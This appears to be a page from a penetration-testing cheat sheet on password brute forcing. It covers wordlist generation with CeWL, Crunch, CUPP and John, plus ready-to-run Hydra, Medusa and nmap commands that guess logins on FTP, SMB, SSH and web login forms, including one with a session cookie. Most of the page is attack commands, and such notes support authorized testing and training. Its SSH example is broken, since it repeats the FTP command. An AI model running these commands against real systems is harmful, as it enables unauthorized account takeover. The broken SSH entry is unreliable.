Brute Forcing

Default Credentials

Note: SecLists and WordList Compendium also include default passwords lists.

Wordlists

Wordlist Generation

CeWL

cewl example.com -m 3 -w wordlist.txt

Parameters

-m <length>: Minimum word length.
-w <file>: Write the output to <file>.

Crunch

Simple wordlist.

crunch 6 12 abcdefghijk1234567890\@\! -o wordlist.txt

String permutation.

crunch 1 1 -p target pass 2019 -o wordlist.txt

Patterns.

crunch 9 9 0123456789 -t @target@@ -o wordlist.txt

Parameters

<min-len>: The minimum string length.
<max-len>: The maximum string length.
<charset>: Characters set.
-o <file>: Specifies the file to write the output to.
-p <charset or strings>: Permutation.
-t <pattern>: Specifies a pattern, eg: @@pass@@@@.
- @ will insert lower case characters
- , will insert upper case characters
- % will insert numbers
- ^ will insert symbols

Password Profiling

CUPP

cupp -i

Parameters

-i: Interactive uestions for user password profiling.

Word Mangling

john

john --wordlist=wordlist.txt --rules --stdout

Parameters

--wordlist <file>: Wordlist mode, read words from <file> or stdin.
--rules[:CustomRule]: Enable word mangling rules. Use default or add [:CustomRule].
--stdout: Output candidate passwords.

Note: Custom rules can be appended to John’s configuration file john.conf.

Services

FTP

Hydra

hydra -v -l ftp -P /usr/share/wordlists/rockyou.txt -f 10.0.0.3 ftp

Parameters

-v: verbose mode.
-l <user>: login with user name.
-P <passwords file>: login with passwords from file.
-f: exit after the first found user/password pair.

SMB

Hydra

hydra -v -t1 -l Administrator -P /usr/share/wordlists/rockyou.txt -f 10.0.0.3 smb

Parameters

-v: verbose mode.
-t <tasks>: run <tasks> number of connects in parallel. Default: 16.
-l <user>: login with user name.
-P <passwords file>: login with passwords from file.
-f: exit after the first found user/password pair.

NSE Script

sudo nmap --script smb-brute -p U:137,T:139 10.0.0.3

SSH

Hydra

hydra -v -l ftp -P /usr/share/wordlists/rockyou.txt -f 10.0.0.3 ftp

Web Applications

HTTP Basic Auth

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-head /admin/

HTTP Digest

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-get /admin/

HTTP POST Form

hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed"

Parameters

-l <user>: login with user name.
-L <users-file>: login with users from file.
-P <passwords file>: login with passwords from file.
http-head | http-get | http-post-form: service to attack.

HTTP Authenticated POST Form

To add the session ID to the options string, simply append the Cookie header with the session ID, like so: :H=Cookie\: security=low; PHPSESSID=if0kg4ss785kmov8bqlbusva3v

hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed:H=Cookie\: PHPSESSID=if0kg4ss785kmov8bqlbusva3v"

Miscellaneous

Combo (Colon Separated) Lists

Hydra

Use a colon separated login:pass format, instead of -L/-P options.

hydra -v -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -f 10.0.0.3 ftp

Parameters

-v: verbose mode.
-C <user:pass file>: colon-separated “login:pass” format.
-f: exit after the first found user/password pair.

Medusa

The combo files used by Medusa should be in the format host:username:password, separated by colons. If any of these three values are missing, the relevant information should be provided either as a global value or as a list in a separate file.

sed s/^/:/ /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt > /tmp/cplist.txt
medusa -C /tmp/cplist.txt -h 10.0.0.3 -M ftp

Parameters

-u <user>: login with user name.
-P <passwords file>: login with password from file.
-h: target hostname or IP address.
-M: module to execute.

PreviousClient-Side Attacks NextPrivilege Escalation

Last updated 6 months ago

Was this helpful?